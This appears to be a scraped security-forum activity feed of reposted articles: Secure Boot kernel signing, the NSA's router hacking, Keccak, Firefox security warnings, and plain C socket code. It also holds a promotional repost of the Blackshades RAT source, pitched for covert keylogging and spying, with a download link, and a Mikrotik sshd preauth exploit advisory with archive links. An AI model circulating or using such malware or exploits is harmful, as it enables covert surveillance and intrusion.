mean, see the Linux Foundation Whitepaper about UEFI Secure boot, published back in 2011. For a more detailed description of the keys, see the UEFI Specification directly. For a very simple description, the “Platform Key” shows who “owns and controls” the hardware platform. The “Key-Exchange keys” shows who is allowed to update the hardware platform, and the “Signature Database keys” show who is allowed to boot the platform in secure mode. If you are interested in how to manipulate these keys, replace them, and do neat things with them, see James Bottomley’s blog for descriptions of the tools you can use and much more detail than I provide here. To manipulate the keys on the system, you need the the UEFI keytool USB image from James’s website called sb-usb.img (md5sum 7971231d133e41dd667a184c255b599f). dd the image to a USB drive, and boot the machine into the image. Depending on the mode of the system (insecure or secure), you will be dropped to the UEFI console, or be presented with a menu. If a command line, type KeyTool to run the keytool binary. If a menu, select the option to run KeyTool directly. Save the keys First thing to do, you should save the keys that are currently on the system, in case something “bad” ever happens and you really want to be able to boot another operating system in secure mode on the hardware. Go through the menu options in the KeyTool program and save off the PK, KEK, and db keys to the USB drive, or to the hard drive, or another USB drive you plug into the system. Take those keys and store them somewhere “safe”. Clear the machine Next you should remove all keys from the system. You can do this from the KeyTool program directly, or just reboot into the BIOS and select an option to “remove all keys”, if your BIOS provides this (some do, and some don’t.) Create and install your own keys Now that you have an “empty” machine, with the previous keys saved off somewhere else, you should download the sbsigntool and efiutil packages and install them on your development system. James has built all of the latest versions of these packages in the openSUSE build system for all RPM and DEB-based Linux distros. If you have a Gentoo-based system, I have checked the needed versions into portage, so just grab them directly from there. If you want to build these from source, the sbsigntool git tree can be found here, and the efitools git tree is here. The efitools README is a great summary of how to create new keys, and here is the commands it says to follow in order to create your own set of keys: # create a PK key openssl req -new -x509 -newkey rsa:2048 -subj "/CN=my PK name/" -keyout PK.key -out PK.crt -days 3650 -nodes -sha256 # create a KEK key openssl req -new -x509 -newkey rsa:2048 -subj "/CN=my KEK name/" -keyout KK.key -out KK.crt -days 3650 -nodes -sha256 # create a db key openssl req -new -x509 -newkey rsa:2048 -subj "/CN=my db name/" -keyout db.key -out db.crt -days 3650 -nodes -sha256 The option -subj can contain a string with whatever name you wish to have for your key, be it your company name, or the like. Other fields can be specified as well to make the key more “descriptive”. Then, take the PK key you have created, turn it into a EFI Signature List file, and add a GUID to the key: cert-to-efi-sig-list -g <my random guid> PK.crt PK.esl Where my random guid is any valid guid you wish to use (I’ve seen some companies use all ‘5’ as their guid, so I’d recommend picking something else a bit more “random” to make look like you know what you are doing with your key…). Now take the EFI Signature List file and create a signed update file: sign-efi-sig-list -k PK.key -c PK.crt PK PK.esl PK.auth For more details about the key creation (and to see where I copied these command lines from), see James’s post about owning your own Windows 8 platform. Take these files you have created, put them on a USB disk, run the KeyTool program and use it to add the db, KEK, and PK keys into the BIOS. Note, apply the PK key last, as once it is installed, the platform will be “locked” and you should not be able to add any other keys to the system. Fail to boot Now that your own set of keys is installed in the system, flip the BIOS back into “Secure boot” mode, and try to boot your previous-successful Linux image again. Hopefully it should fail with some type of warning, the laptop I did this testing on provides this “informative” graphic: Sign your kernel Now that your kernel can’t boot, you need to sign it with the db key you placed in your bios: sbsign --key db.key --cert db.crt --output bzImage bzImage.signed Take the bzImage.signed file and put it back in the boot partition, copying over the unsigned /boot/EFI/boot/bootx64.efi file. Profit! Now, rebooting the machine should cause the UEFI bios to check the signatures of the signed kernel image, and boot it properly. Demo I’ve recorded a video of a Gateway laptop booting a signed kernel, with my own key, here. The demo tries to boot an unsigned kernel image that is on the hard disk, but it fails. I plug in a signed kernel that is on the USB disk, and it properly boots. I did the test with a CoreOS image as it provides a very small self-contained Linux system that allows for easy testing/building from a development machine. Future plans Now that you have full control over your system, running only a Linux kernel image that you sign yourself, a whole raft of possibilities open up. Here’s a few that I can think off of the top of my head: Linux signed system self-contained in the kernel image (with initramfs) booting into ram, nothing on the disk other than the original kernel image. Signed kernel image initramfs validates the other partitions with a public key to ensure they aren’t tampered before mounting and using them (ChromeOS does this exact thing quite well). This passes the “chain of trust” on to the filesystem image, giving you assurances that you are running code you trust, on a platform you trust. Combine signed kernel images with TPM key storage to unlock encrypted partitions. If you are interested in these types of things, I’ll be at the Linux Plumbers Conference in a few weeks, where a bunch of people will be discussing secure boot issues with Linux. I’ll also be at LinuxCon North America, Europe, and Korea if you want to talk about UEFI and Linux issues there. Posted by Greg Kroah-Hartman Sursa: booting a self-signed Linux kernel - Linux Kernel Monkey Log
  13. Nytro
    Blackshades 2.6.3 Source Posted by: FastFlux September 2, 2013 Blackshades full source, coded in Visual Basics 6. Blackshades Remote Controller is a RAT (Remote Administration Application) which allows a user to control several clients from around the world. Long recognized as the king/master of all RATs, Blackshades NET has been through many iterations through the years. A comprehensive software! Wise enough to teach an absolute beginner and powerful enough to manage and master any computer at distance. The Blackshades Team has long been known as “brains behind the best-selling brand in the remote tech section”. Need to help out a customer who is having trouble setting up a piece of software? Have you ever questioned what your spouse, kids or employees have been doing on the computer? Is your child misusing the Internet facility and taking secret chat with the stranger? Are your employees mailing your business data to your competitors? Blackshades Remote Controller will enable you to control the client’s PC as if you were sitting right in front of it, with support for mouse and keyboard input! You can also chat with the client while you do so. Got a Network to manage? With Blackshades Remote Controller you can connect to unlimited systems, and administer them collectively or individually. You can transfer files and folders between systems, view all the screens of the systems simultaneously and perform maintenance actions. Send a message to all of them with one click, chat with the systems, run commands via the remote command prompt…there’s a huge range of functions suited for network management. Blackshades Remote Controller also provides as an efficient way of turning your machine into a surveillance/spy-device or to spy on a specific system. If you want to monitor all keystrokes on your computer while you are away, or want to make sure your child is being safe while using the computer, the built in tools such as the keystroke capturer, screen viewer and process manager will aid you to do so. This tool has no dependencies (.NET Framework, java, etc) and works extremely well and stable. Blackshades Remote Controller will let you remotely control your machines, while giving you complete peace of mind. Using this tool will allow you to do anything between controlling software and hardware. Customers also get free support, and ability to instantly communicate with other members. Download: https://app.box.com/s/a9xcr3izpu632v4az98s Sursa: Blackshades 2.6.3 Source Blackshades 2.6.3 Source
  14. Nytro
    NSA Laughs at PCs, Prefers Hacking Routers and Switches By Kim Zetter 09.04.13 6:30 AM The NSA runs a massive, full-time hacking operation targeting foreign systems, the latest leaks from Edward Snowden show. But unlike conventional cybercriminals, the agency is less interested in hacking PCs and Macs. Instead, America’s spooks have their eyes on the internet routers and switches that form the basic infrastructure of the net, and are largely overlooked as security vulnerabilities. Under a $652-million program codenamed “Genie,” U.S. intel agencies have hacked into foreign computers and networks to monitor communications crossing them and to establish control over them, according to a secret black budget document leaked to the Washington Post. U.S. intelligence agencies conducted 231 offensive cyber operations in 2011 to penetrate the computer networks of targets abroad. This included not only installing covert “implants” in foreign desktop computers but also on routers and firewalls — tens of thousands of machines every year in all. According to the Post, the government planned to expand the program to cover millions of additional foreign machines in the future and preferred hacking routers to individual PCs because it gave agencies access to data from entire networks of computers instead of just individual machines. Most of the hacks targeted the systems and communications of top adversaries like China, Russia, Iran and North Korea and included activities around nuclear proliferation. The NSA’s focus on routers highlights an often-overlooked attack vector with huge advantages for the intruder, says Marc Maiffret, chief technology officer at security firm Beyond Trust. Hacking routers is an ideal way for an intelligence or military agency to maintain a persistent hold on network traffic because the systems aren’t updated with new software very often or patched in the way that Windows and Linux systems are. “No one updates their routers,” he says. “If you think people are bad about patching Windows and Linux (which they are) then they are … horrible about updating their networking gear because it is too critical, and usually they don’t have redundancy to be able to do it properly.” He also notes that routers don’t have security software that can help detect a breach. “The challenge [with desktop systems] is that while antivirus don’t work well on your desktop, they at least do something [to detect attacks],” he says. “But you don’t even have an integrity check for the most part on routers and other such devices like IP cameras.” Hijacking routers and switches could allow the NSA to do more than just eavesdrop on all the communications crossing that equipment. It would also let them bring down networks or prevent certain communication, such as military orders, from getting through, though the Post story doesn’t report any such activities. With control of routers, the NSA could re-route traffic to a different location, or intelligence agencies could alter it for disinformation campaigns, such as planting information that would have a detrimental political effect or altering orders to re-route troops or supplies in a military operation. According to the budget document, the CIA’s Tailored Access Programs and NSA’s software engineers possess “templates” for breaking into common brands and models of routers, switches and firewalls. The article doesn’t say it, but this would likely involve pre-written scripts or backdoor tools and root kits for attacking known but unpatched vulnerabilities in these systems, as well as for attacking zero-day vulnerabilities that are yet unknown to the vendor and customers. “[Router software is] just an operating system and can be hacked just as Windows or Linux would be hacked,” Maiffret says. “They’ve tried to harden them a little bit more [than these other systems], but for folks at a place like the NSA or any other major government intelligence agency, it’s pretty standard fare of having a ready-to-go backdoor for your [off-the-shelf] Cisco or Juniper models.” Not all of the activity mentioned in the budget document involved remote hacking. In some cases, according to the document, the operations involved clandestine activity by the CIA or military intelligence units to “physically place hardware implants or software modifications” to aid the spying. “Much more often, an implant is coded entirely in software by an NSA group called Tailored Access Operations (TAO),” the Post writes in its story about the document. “As its name suggests, TAO builds attack tools that are custom-fitted to their targets.” A handful of security researchers have uncovered vulnerabilities in routers in recent years that could be used to do the kind of hacking described in the budget document. In 2005, security researcher Mike Lynn found a serious vulnerability in Cisco IOS, the operating system running on millions of Cisco routers around the world. Lynn discovered the vulnerability after his employer, Internet Security Systems, asked him to reverse-engineer the Cisco operating system to see if he could find security problems with it. Cisco makes the majority of the routers that operate the backbone of the internet as well as many company networks and critical infrastructure systems. The Cisco IOS is as ubiquitous in the backbone as the Windows operating system is on desktops. The vulnerability Lynn found, in a new version of the operation system that Cisco planned to release at the time, would have allowed someone to create a router worm that would shut down every Cisco router through which it passed, bringing down a nation’s critical infrastructure. It also would have allowed an attacker to gain complete control of the router to sniff all traffic passing through a network in order to read, record or alter it, or simply prevent traffic from reaching its recipient. Once Lynn found the vulnerability, it took him six months to develop a working exploit to attack it. Lynn had planned to discuss the vulnerability at the Black Hat security conference in Las Vegas, until Cisco intervened and forced him to pull the talk under threat of a lawsuit. But if Lynn knew about the vulnerability, there were likely others who did as well — including intelligence agencies and criminal hackers. Source code for Cisco’s IOS has been stolen at least twice, either by entities who were interested in studying the software to gain a competitive advantage or to uncover vulnerabilities that would allow someone to hack or control them. Other researchers have uncovered different vulnerabilities in other Cisco routers that are commonly used in small businesses and home offices. Every year at computer security conferences — including the Black Hat conference where NSA Director Keith Alexander presented a keynote this year — U.S. intelligence agencies and contractors from around the world attend to discover information about new vulnerabilities that might be exploited and to hire talented researchers and hackers capable of finding more vulnerabilities in systems. In 2008, a researcher at Core Security Technologies developed a root kit for the Cisco IOS that was designed to give an attacker a persistent foothold on a Cisco router while remaining undetected. According to the Post story, the NSA designs most of the offensive tools it uses in its Genie operation, but it spent $25.1 million in one year for “additional covert purchases of software vulnerabilities” from private malware vendors who operate on the grey market — closed markets that peddle vulnerabilities and exploits to law enforcement and intelligence agencies, as opposed to the black market that sells them to cyber criminals. The price of vulnerabilities and exploits varies, depending on a number of factors. Vulnerabilities and exploits can sell for anywhere from $50,000 to more than a million, depending on the exclusivity of the purchase — some vulnerabilities are sold to multiple parties with the understanding that others are using it as well — and their ubiquity. A vulnerability that exists in multiple versions of an operating system is more valuable than a vulnerability that exists in just one version. A class of vulnerability that crosses multiple browser brands is also more valuable than a single vulnerability that just affects the Safari browser or Chrome. The Stuxnet cyber weapon that was reportedly created by the U.S. and Israel to sabotage centrifuges used in Iran’s uranium enrichment program, used five zero-day exploits to spread itself among systems in Iran, including a rare exploit that attacked the .LNK function in multiple versions of the Windows operating system in order to spread the worm silently via infected USB sticks. Ubiquitous router vulnerabilities are difficult to find since there are so many different configurations for routers, and an attack that works against one router configuration might not work for another. But a vulnerability that affects the core operating system is much more valuable since it is less likely to be dependent on the configuration. Maiffret says there hasn’t been a lot of public research on router vulnerabilities, but whenever someone has taken a look at them, they have found security holes in them. “They’re always successful in finding something,” he says. Once a vulnerability becomes known to the software maker and is patched, it loses a lot of its value. But because many users and administrators do not patch their systems, some vulnerabilities can be used effectively for years, even after a patch is available. The Conficker worm, for example, continued to infect millions of computers long after Microsoft released a patch that should have stopped the worm from spreading. Routers in particular often remain unpatched because system administrators don’t think they will be targeted and because administrators are concerned about network outages that could occur while the patch is applied or if the patch is faulty. Sursa: NSA Laughs at PCs, Prefers Hacking Routers and Switches | Threat Level | Wired.com
  15. Nytro
    Keccak and the SHA-3 Standardization Guido Bertoni1 Joan Daemen1 Michaël Peeters2 Gilles Van Assche1 1STMicroelectronics 2NXP Semiconductors NIST, Gaithersburg, MD February 6, 2013 The beginning The sponge construction Inside Keccak Analysis underlying Keccak Applications of Keccak, or sponge Some ideas for the SHA-3 standard Slides: http://csrc.nist.gov/groups/ST/hash/sha-3/documents/Keccak-slides-at-NIST.pdf
  16. Nytro
    [h=1]A New Focus on Security in the Web Console[/h]Garrett Robinson Web developers need better tools to help them debug security issues. The Web Console, part of the Firefox Developer Tools, shows errors and warnings filtered into different categories. Firefox 23 adds a new category of messages to the Web Console: Security messages. Toggle buttons for categories of messages in the Web Console The Security toggle button and messages are red to warn developers, since some of these messages indicate that your site has a security vulnerability. Once we had a dedicated place for security messages, we had to decide what kinds of issues should be reported to developers. Ivan Alagenchev, a security engineering intern, spent the summer improving security reporting to fulfill the following goals: Warn developers about altered site behavior that is due to a security feature (for example, resource loads blocked by the Mixed Content Blocker or the Same Origin Policy). Warn developers about mistakes made in implementing security features (for example, using deprecated CSP headers, or mistyping an HSTS header). Warn developers about common security risks (for example, putting password fields on insecure pages). Here are example screenshots of some of the new Security messages: Warnings for loading mixed content Warning for detected password field on an insecure page. These specific messages are available to current Nightly users and will be part of upcoming stable releases. While security should be of paramount importance to any developer, it is a complex subject that is not always part of a web developer’s education and often appears at inconvenient times. This new messaging helps developers find security-related problems early on in the development life cycle so they can be resolved quickly and effectively. Additionally, these messages help educate developers about common issues in web security. Many of the new messages end with a “Learn More” link that takes you to a wiki with background information and advice for mitigating the security issue. Bug 863874 is the meta-bug for logging relevant security messages to the Web Console. If you have more ideas for useful features like the ones discussed here, or are interested in contributing, check out the metabug and its dependencies! Sursa: https://blog.mozilla.org/security/2013/09/04/a-new-focus-on-security-in-the-web-console/
  17. Nytro
    [h=1]Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption[/h] During an audit the Mikrotik RouterOS sshd (ROSSSH) has been identified to have a remote previous to authentication heap corruption in its sshd component. Exploitation of this vulnerability will allow full access to the router device. This analysis describes the bug and includes a way to get developer access to recent versions of Mikrotik RouterOS using the /etc/devel-login file. This is done by forging a modified NPK file using a correct signature and logging into the device with username ‘devel’ and the password of the administrator. This will drop into a busybox shell for further researching the sshd vulnerability using gdb and strace tools that have been compiled for the Mikrotik busybox platform. Shodanhq.com shows >290.000 entries for the ROSSSH search term. The 50 megs Mikrotik package including the all research items can be downloaded here: http://www.farlight.org/mikropackage.zip http://www.exploit-db.com/sploits/28056.zip Sursa: Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption Ok, acum am inteles. Zilele trecute am primit DDOS (cica) de pe 550+ IP-uri. ( Info ) Asa cum Shocker a sugerat, acele IP-uri erau routere Microtik. Am o vaga impresie ca aceasta este metoda prin care cine nu ne place a obtinut acces la acele routere.
  18. Nytro
    Uuu, astia platesc bine nu?
  19. Nytro

    TCPUDP in C

    Nytro posted a topic in Programare

    [h=1]TCPUDP in C[/h] /* ============================================================================ Name : TCPServer.c Author : www.facebook.com/unix4u Version : Copyright : LGPL Description : TCP-SERVER IN C, Ansi-style ============================================================================ */ #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <errno.h> #include <unistd.h> #include <string.h> #include <signal.h> void signalhandler(int signum) { if(SIGTERM==signum) { printf("See you later bye\n"); exit(SIGTERM); } } int main(int argc,char *argv[]) { signal(SIGTERM,signalhandler); int server_sock_fd,client_sock_fd; struct sockaddr_in server_addr; char readbuffer[256]="",writebuffer[256]=""; if(argc<2) { printf("please run as ./TCPServer <port-no> \n"); exit(1); } server_sock_fd=socket(AF_INET,SOCK_STREAM,0); perror("Create socket"); if(errno!=0) exit(errno); server_addr.sin_family=AF_INET; server_addr.sin_addr.s_addr=htonl(INADDR_ANY); server_addr.sin_port=htons(atoi(argv[1])); bind(server_sock_fd,(struct sockaddr *)&server_addr,sizeof(server_addr)); perror("Bind"); if(errno!=0) exit(errno); listen(server_sock_fd,1); perror("Listen"); if(errno!=0) exit(errno); while(1) { int i,j,k,array[20]; char temp[256]; i=0;j=0;k=0; strcpy(temp," "); client_sock_fd=accept(server_sock_fd,(struct sockaddr *)NULL,(socklen_t *)NULL); perror("Accept"); read(client_sock_fd,readbuffer,sizeof(readbuffer)); perror("Get Data"); if(strcmp(readbuffer," stop")) break; strcpy(writebuffer," "); for(i=0;i<=strlen(readbuffer);i++) { if(readbuffer!=':'&&i!=strlen(readbuffer)) { if((readbuffer-'0'<=9)) temp[j++]=readbuffer; } else { array[k++]=atoi(temp); j=0; strcpy(temp," "); } } int ntemp; for(i=0;i<k;i++) { for(j=0;j<k-i-1;j++) { if(array[j]>array[j+1]) { ntemp=array[j]; array[j]=array[j+1]; array[j+1]=ntemp; } } } for(i=0;i<k;i++) { strcpy(temp," "); sprintf(temp,"%d ",array); strcat(writebuffer,temp); } write(client_sock_fd,writebuffer,sizeof(writebuffer)); perror("Send Data"); close(client_sock_fd); perror("Close connection"); strcpy(readbuffer," "); } close(server_sock_fd); perror("Server Termination"); return errno; } /* ============================================================================ Name : TCPClient.c Author : www.facebook.com/unix4u Version : Copyright : LGPL Description : TCP CLIENT in C, Ansi-style ============================================================================ */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <arpa/inet.h> #include <sys/socket.h> #include <unistd.h> #include <netinet/in.h> #include <string.h> #include <signal.h> void signalhandler(int signum) { if(SIGALRM==signum) { printf("Host timed Out\n"); exit(ETIMEDOUT); } if(SIGTERM==signum) { printf("See you later bye\n"); exit(SIGTERM); } } int main(int argc,char *argv[]) { signal(SIGALRM,signalhandler); signal(SIGTERM,signalhandler); int socket_fd; char writebuffer[256]="",readbuffer[256]=""; struct sockaddr_in server_addr; int i; if(argc<4) { printf("please run as ./TCPClient <ip-address> <port-no> <numbers>/stop \n"); exit(1); } if(argc>3) { strcat(writebuffer,argv[3]); for(i=4;i<argc;i++) { strcat(writebuffer,":"); strcat(writebuffer,argv); } } socket_fd=socket(AF_INET,SOCK_STREAM,0); perror("Create socket"); if(errno) exit(errno); server_addr.sin_family=AF_INET; server_addr.sin_port=htons(atoi(argv[2])); inet_pton(AF_INET,argv[1],&server_addr.sin_addr.s_addr); perror("Ip address convertion"); if(errno) exit(errno); alarm(5); connect(socket_fd,(struct sockaddr *)&server_addr,sizeof(server_addr)); perror("Connection"); if(errno) exit(errno); write(socket_fd,writebuffer,sizeof(writebuffer)); perror("Send Data"); if(errno) exit(errno); read(socket_fd,&readbuffer,sizeof(readbuffer)); perror("Get Data"); if(errno) exit(errno); puts(readbuffer); close(socket_fd); perror("Connection close"); return errno; } /* ============================================================================ Name : UDPServer.c Author : www.facebook.com/unix4u Version : Copyright : LGPL Description : UDP SERVER in C, Ansi-style ============================================================================ */ #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <errno.h> #include <sys/socket.h> #include <sys/types.h> #include <unistd.h> #include <arpa/inet.h> #include <string.h> #include <signal.h> void signalhandler(int signum) { if(SIGTERM==signum) { printf("See you later bye\n"); exit(SIGTERM); } } int main(int argc,char *argv[]) { signal(SIGTERM,signalhandler); struct sockaddr_in server_addr,client_addr; char readbuffer[256]="",writebuffer[256]=""; int server_sock_fd; socklen_t len=sizeof(client_addr); if(argc!=2) { printf("please run as ./UDPServer <port-no>\n"); exit(1); } server_sock_fd=socket(AF_INET,SOCK_DGRAM,0); perror("Create socket"); if(errno) exit(errno); server_addr.sin_family=AF_INET; server_addr.sin_port=htons(atoi(argv[1])); server_addr.sin_addr.s_addr=htonl(INADDR_ANY); bind(server_sock_fd,(struct sockaddr *)&server_addr,sizeof(server_addr)); perror("Bind"); if(errno) exit(errno); while(1) { int i,j,k,array[20]; char temp[256]; i=0;j=0;k=0; recvfrom(server_sock_fd,readbuffer,sizeof(readbuffer),0,(struct sockaddr*)&client_addr,&len); perror("Get Data"); if(strcmp(readbuffer," stop")) break; strcpy(writebuffer," "); for(i=0;i<=strlen(readbuffer);i++) { if(readbuffer!=':'&&i!=strlen(readbuffer)) { if((readbuffer-'0'<=9)) temp[j++]=readbuffer; } else { array[k++]=atoi(temp); j=0; strcpy(temp," "); } } int ntemp; for(i=0;i<k;i++) { for(j=0;j<k-i-1;j++) { if(array[j]>array[j+1]) { ntemp=array[j]; array[j]=array[j+1]; array[j+1]=ntemp; } } } for(i=0;i<k;i++) { strcpy(temp," "); sprintf(temp,"%d ",array); strcat(writebuffer,temp); } sendto(server_sock_fd,writebuffer,sizeof(writebuffer),0,(struct sockaddr*)&client_addr,len); perror("Send Data"); } close(server_sock_fd); perror("Server Termination"); return errno; } /* ============================================================================ Name : UDPClient.c Author : www.facebook.com/unix4u Version : Copyright : LGPL Description : UDP Client in C, Ansi-style ============================================================================ */ #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <errno.h> #include <unistd.h> #include <string.h> #include <arpa/inet.h> #include <signal.h> void signalhandler(int signum) { printf("Host Timed out\n"); exit(ETIMEDOUT); } int main(int argc,char *argv[]) { signal(SIGALRM,signalhandler); struct sockaddr_in server_addr; socklen_t len=sizeof(server_addr); char readbuffer[256]="",writebuffer[256]=""; int server_sock_fd,i; if(argc<4) { printf("please run as ./TCPClient <ip-address> <port-no> <numbers>/stop\n"); exit(1); } if(argc>3) { strcat(writebuffer,argv[3]); for(i=4;i<argc;i++) { strcat(writebuffer,":"); strcat(writebuffer,argv); } } server_sock_fd=socket(AF_INET,SOCK_DGRAM,0); perror("Create socket"); if(errno) exit(errno); server_addr.sin_family=AF_INET; server_addr.sin_port=htons(atoi(argv[2])); inet_pton(AF_INET,argv[1],&server_addr.sin_addr.s_addr); perror("Ip address convertion"); if(errno) exit(errno); sendto(server_sock_fd,writebuffer,sizeof(writebuffer),0,(struct sockaddr *)&server_addr,len); perror("Send Data"); alarm(5); recvfrom(server_sock_fd,readbuffer,sizeof(readbuffer),0,(struct sockaddr *)&server_addr,&len); perror("Get Data"); puts(readbuffer); close(server_sock_fd); perror("Close connection"); return errno; } Sursa: [C] TCPUDP in C - Pastebin.com
  20. Nytro
    In ziua de azi totul e pe bani...
  21. Nytro
    Si prezentarile se vor tine in limba... romana? Desigur, cele ale speakerilor romani ma refer.
  22. Nytro

    Este posibil?

    Nytro replied to robyyxx's topic in Off-topic

    Da. Cand folosesti TrueCrypt, parola e pastrata in memorie pentru a putea decrypta datele cand e necesar. Programul doar o citeste de acolo. Nu e tocmai "rocket science". S-au scris, stupid, stiri despre acest tool: $300 tool can decrypt PGP, TrueCrypt files without a password | Chips | Geek.com E ceva absolut normal. Daca ii dai cuiva un harddisk cryptat cu truecrypt, fara sa fie decryptat de executia programului TrueCrypt cu parola corecta introdusa, e inutil.
  23. Nytro
    S-a mai discutat, insa intr-o maniera tehnica, frumos prezentata. [ https://rstforums.com/forum/74740-dos-exploit-pentru-webkit-nu-deschide-pagina-dac-folose-ti-mac-os-10-8-sau-ios-6-a.rst ] E ok si varianta pentru cocalari.
  24. Nytro

    010 Editor

    Nytro posted a topic in Programe utile

    Text Editor Edit text files, XML, HTML, Unicode and UTF-8 files, C/C++ source code, PHP, etc. Unlimited undo and powerful editing and scripting tools. Hex Editor Unequalled binary editing performance. Edit any file of any size. Use powerful Binary Templates technology to understand binary data. Disk Editor Find and fix programs with hard drives, memory keys, flash drives, CD-ROMs, etc Process Editor Investigate and modify memory from processes. Download: http://www.sweetscape.com/download/download_010editor.html Opinie: Aveam un fisier mare, de 250 MB, text. Aveam de selectat cam 80 MB din el si sa pun acele date in alt fisier. Notepad++ si gVim o sug grav, Notepad++ cel putin se fute si mi-a futut si Clipboard-ul, deci muie Notepad++. Am stat cam 20 de minute sa selectez textul tinand page down apasat si pula. Cu programelul asta am facut: 1. Mark selection start 2. Mark selection end 3. Copy/Paste Muie Notepad++. PS: E trial.
  25. Nytro
    Am mutat cateva (4-5) tutoriale aici. Cred ca ar fi mai usor de gasit pentru toata lumea sa le grupam astfel. La Tutoriale sunt multe altele si daca cineva e interesat in special de acest subiect le poate gasi aici mult mai usor.
×
×
  • Create New...